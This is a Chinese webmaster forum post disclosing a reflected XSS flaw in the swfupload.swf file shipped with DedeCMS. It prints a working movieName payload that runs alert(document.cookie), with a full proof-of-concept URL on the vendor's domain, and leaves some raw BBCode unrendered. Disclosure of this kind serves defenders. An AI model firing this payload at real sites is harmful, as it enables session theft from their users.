立即注册 找回密码
首页>站长交流专区>站长头条>Dedecms flash反射性XSS跨站
小草根

Dedecms flash反射性XSS跨站

作者:小草根   发布时间:2014-09-28 10:13   回复数:0   浏览数:909
小草根
9090小草根管理员
2014-09-28 10:13:37
9090 2014-09-28 10:13:37
话题: flash
详细说明:[p=25, null, left][color=rgb(0, 0, 0)]Location: /uploads/images/swfupload/swfupload.swf



漏洞文件为:




这个flash文件存在漏洞,此文件漏洞可参考:https://nealpoole.com/blog/2012/05/xss-and-csrf-via-swf-applets-swfupload-plupload/



构造XSS攻击

?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//[/p]漏洞证明:[p=25, null, left][color=rgb(0, 0, 0)]http://www.dedecms.com/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//



[/p][p=25, null, left][color=rgb(0, 0, 0)][/p]

分享喜欢 0回复
回复
游客
登录后才可以回帖,登录 或者 注册